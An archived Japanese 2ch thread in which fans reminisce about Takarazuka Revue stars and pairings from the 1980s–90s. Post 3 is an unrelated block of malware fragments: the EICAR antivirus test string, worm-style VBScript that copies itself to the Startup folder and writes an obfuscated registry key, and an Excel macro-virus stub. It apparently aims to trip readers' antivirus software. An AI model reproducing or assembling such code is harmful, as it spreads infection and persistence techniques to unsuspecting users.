2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

昔のヅカを語ろう 2

1 :名無しさん@花束いっぱい。:2007/01/09(火) 10:59:02 ID:Hu86gawn

昭和終盤〜平成にかけての、ちょっと前の世代の宝塚を語りましょう。
知らない世代の話題が出てきたら、しばらくROMでおべんきょ推奨。
10年以上前のOGは、愛称だけじゃなく芸名も書き添えて。
【前スレ】昔のヅカを語ろう
http://hobby8.2ch.net/test/read.cgi/siki/1150239844/
【前々スレ】 10年前のヅカを語ろう Part14
http://hobby8.2ch.net/test/read.cgi/siki/1145794526/
(過去スレ等は>>2-4あたり)




2 :名無しさん@花束いっぱい。:2007/01/09(火) 16:57:59 ID:25Bkuf9s
あらっ、こんなところに”昔スレ”見〜つけた!
もう大・子なんてブスの話題は止めて、綺麗な素敵な昔のジェンヌについて語りましょ。
これからは今までのベストカップルやその代表作なんかのことがいいわ。
お芝居では「遥かなる旅路の果てに」の高汐&秋篠コンビ
ショーでは「メモリーズ・オブ・ユー」
が思い出深い作品ですね〜、いやん泣けてくるわっ。
皆さんの思い出の作品や、思い入れ深いコンビの話しを聞かせてね!

3 :名無しさん@花束いっぱい。:2007/01/09(火) 17:08:49 ID:Ie+xg8RZ
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

4 :sage:2007/01/09(火) 22:31:20 ID:ZO+tkcLG
個人的に、紫苑ゆう&毬藻えりコンビが大好き。
トップコンビとして叶わなかったから自分の中で美化されすぎて。。。

5 :名無しさん@花束いっぱい。:2007/01/09(火) 22:36:02 ID:FcmOutu5
ココ、何か久しぶりだね。
高汐さんの『琥珀〜』よかったなぁ。      
チャーリーの再演は何か違ったなぁ、皆が早口で台詞言うからか?     
しっとりした情緒が感じられなかったな。    
卒業してからの高汐さんのドレス姿を見てセンスいいなぁと感心した。

6 :名無しさん@花束いっぱい。:2007/01/09(火) 23:03:43 ID:Bozm8udZ
リターンズですのね。
他スレにはない含蓄と経験豊かなレスが楽しみです。

7 :名無しさん@花束いっぱい。:2007/01/09(火) 23:07:13 ID:BjgoEVTp
【過去スレ】
10年前のヅカを語ろう
 01 http://hobby2.2ch.net/test/read.cgi/siki/1051456680/
 02 http://hobby2.2ch.net/test/read.cgi/siki/1055151787/
 03 http://hobby2.2ch.net/test/read.cgi/siki/1062019712/
 04 http://hobby2.2ch.net/test/read.cgi/siki/1066909669/
 05 http://hobby3.2ch.net/test/read.cgi/siki/1072744014/
 06 http://hobby3.2ch.net/test/read.cgi/siki/1080550148/
 07 http://hobby5.2ch.net/test/read.cgi/siki/1084236107/
 08 http://hobby5.2ch.net/test/read.cgi/siki/1101658687/
 09 http://hobby5.2ch.net/test/read.cgi/siki/1109805720/
 10 http://hobby8.2ch.net/test/read.cgi/siki/1116562034/
 11 http://hobby8.2ch.net/test/read.cgi/siki/1121775455/
 12 http://hobby8.2ch.net/test/read.cgi/siki/1127910855/
 13 http://hobby8.2ch.net/test/read.cgi/siki/1141969628/
 14 http://hobby8.2ch.net/test/read.cgi/siki/1141969628/
昔のヅカを語ろう
 01 http://hobby8.2ch.net/test/read.cgi/siki/1150239844/

8 :名無しさん@花束いっぱい。:2007/01/10(水) 01:06:46 ID:d0s5PGl/
>4
そのコンビも見たかったわねぇ。
でも、白城さんが凄く素敵な娘役さんだったから
これで良かったのかなと思ってますね。
学年が逆さまだったら、日向・白城、紫苑・毬藻もいいと思う。
いけないっ、麻路・毬藻コンビになってたら歌がどえらい事になってた…orz

9 :名無しさん@花束いっぱい。:2007/01/10(水) 01:42:06 ID:IPXT7OGI
こないだ実家の親にダメもとで一応聞いたら
30年くらい前のベルばらのLPレコードがとってあったのでもらってキタ。
安奈淳とか榛名由梨とかの時代ね。
でももうプレーヤーがないので聞けない。w

10 :名無しさん@花束いっぱい。:2007/01/10(水) 02:53:54 ID:6JWFA8U2
>9 ん〜、安奈さんは容姿も歌もいいと思うけど、榛名さんはねぇ…orz
>8 麻路&毬藻…おぞましい限りですぅ


11 :名無しさん@花束いっぱい。:2007/01/10(水) 10:13:32 ID:1sKqfoUJ
大浦・ひびきコンビと、日向・毬藻コンビが好きだった。
なつめさんは いつも「おキャル様」って呼んでたけど、
たま〜に「美都ちゃん」って呼んでたのが なんか微笑ましかったな。

12 :名無しさん@花束いっぱい。:2007/01/11(木) 04:15:29 ID:Sv5ZLb94
私もネッシー・シギちゃんコンビ好きだった。  
2番手のシメさんもあやちゃんもーあの頃の星組全体が好きだったな。   
シギちゃんはそんなに歌がおぞましかったかな? 
小柄ながら華もあって、よくネッシーさんを支えてたと思うけど

6 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)